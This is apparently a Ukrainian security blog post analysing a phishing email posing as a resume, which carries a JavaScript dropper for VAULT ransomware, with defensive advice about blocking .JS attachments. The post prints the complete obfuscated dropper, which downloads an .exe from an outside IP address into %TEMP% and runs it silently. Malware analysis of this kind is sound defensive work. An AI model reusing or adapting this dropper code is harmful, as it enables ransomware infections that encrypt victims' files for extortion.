чого варті 37 рядків коду?

js_2KB

Продовження теми про js dropper для VAULT ransomware. Моя колекція вірусів нещодавно поповнилася новим семплом. Знайомтесь – новий зразок розсилається під виглядом резюме:

Good afternoon!!! my name is John Doe. my resume is doc file.

Feel free to contact us for further information.

Best regards

John Doe

Не важко здогадатися, що в аттачі зовсім не резюме і зовсім не Word`івський документ ;)

Що ж ми маємо: на одній шальці терезів 37 рядків (якихось 2КБ коду), а на іншій – ~ 10 тисяч гривень* за відновлення доступу до зашифрованих файлів. Що, важко повірити? А між тим це реальність. Як бачите, простіше може бути лише ярлик або прямий лінк на payload.

* з надійних джерел стало відомо, що фіксованої такси немає, ціна визначається для кожної системи окремо (аналіз файлів та параметрів машини?). Така собі своєрідна реалізація “персонального підходу” до жертви з боку зловмисників. Наведена цифра – це сума викупу, який озвучили зловмисники для однаєї організації, чий бухгалтер став жертвою даного вірусу.

Якщо згадати, то ще кілька місяців тому ми мали справу з таким:

Акт_сверкиА тепер крім .EXE та .SCR треба блокувати ще й .JS, причому зверніть увагу – розрахунок дуже тонкий, адже навіть при великому бажанні адміна порізати .JS через GPO – на бухгалтерських машинах це майже нереально (привіт клієнт-банкам та іншим самописним додаткам).

Спостерігаючи за еволюцією вірусів-вимагачів, на думку приходять такі рядки:

“Ладно, ладно…” – пробормотал  Румата,  отложил письмо, снова взял конверт и с интересом его  оглядел.  Да,  тоньше  стали работать. Заметно тоньше.
(с) Трудно быть Богом, Аркадий и Борис Стругацкие

Про всяк випадок наведу лістинг скрипта:

(function (KoKcft) {
function aVWQhsstSqoZ(eADQHj)
{
return new KoKcft.ActiveXObject(eADQHj)
}
var mDvRCsgLRzmtGfG = true, dmEbqVHBYRJe = “DB.Stream”;
var YqTmIx;
YqTmIx = function (KaKFcDYJbvIm, NSBmPWZ, oTnbrilP) {
var IAaGpH = aVWQhsstSqoZ(“WScript”+(1354969, “.Shell”));
var PzbgqWmYaoNrjPC = aVWQhsstSqoZ(“MSXML2.XMLHTTP”);
var pKFrVxTqQrQu = “%TEMP%\\”;
var NSBmPWZ = IAaGpH.ExpandEnvironmentStrings(pKFrVxTqQrQu) + NSBmPWZ;
PzbgqWmYaoNrjPC.onreadystatechange = function ()
{
if (PzbgqWmYaoNrjPC.readyState == 4)
{
mDvRCsgLRzmtGfG = false;
with(aVWQhsstSqoZ(“ADO” + dmEbqVHBYRJe))
{
open();
type = 1;
write(PzbgqWmYaoNrjPC.ResponseBody);
saveToFile(NSBmPWZ, 2);
close();
return NSBmPWZ;
}
}
}
PzbgqWmYaoNrjPC.open(“G” + (3630489, 4593171, “ET”), KaKFcDYJbvIm, false);
PzbgqWmYaoNrjPC.send();
while (mDvRCsgLRzmtGfG) {KoKcft.WScript.Sleep(1000)}
if (((new Date())>0,1069))
IAaGpH.Run(NSBmPWZ, 0, 0);
}
eWHggwxvhx = “httDLZCEGHQTDBr”/*eWHggwxvhxLyVfWYHyyObaEAx*/.replace(“tDLZCEGHQTDBr”,”tp://”);
YqTmIx(eWHggwxvhx + “46.30”+”.43.183/sy”+”ria.”+”e”+”x”+”e”, “144157771.exe“, 1);
})(this)/*990234507307480333455052203452*/

Тут замість base64 просто застосували concatenation для маскування URL. Алгоритм доволі примітивний – завантажити .EXE у каталог %TEMP% і запустити. Але ж це лише початок.

Адже будуть знаходитись компанії, в яких завчасно не подбали ні про захист, ні про бекапи. І будуть платити викуп. А це буде стимулювати галузь.

На жаль, я вже відстежую непоодинокі випадки зараження. І далі буде тільки гірше, бо код буде вдосконалюватися, а люди… Людську недбалість важко “пропатчити”, цим і користуються зловмисники, практикуючи соц. інжиніринг.

Самое дорогое на свете — глупость, потому что за неё дороже всего приходится платить.

(с) Место встречи изменить нельзя

# # #

Будьте обережними і уважними.

Не поспішайте відкривати/запускати приєднання з листів – два кліки можуть насправді дорого коштувати.

Правила здорового глузду шукайте у попередньому дописі.

VR

Advertisements

Tags: , , , , , , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: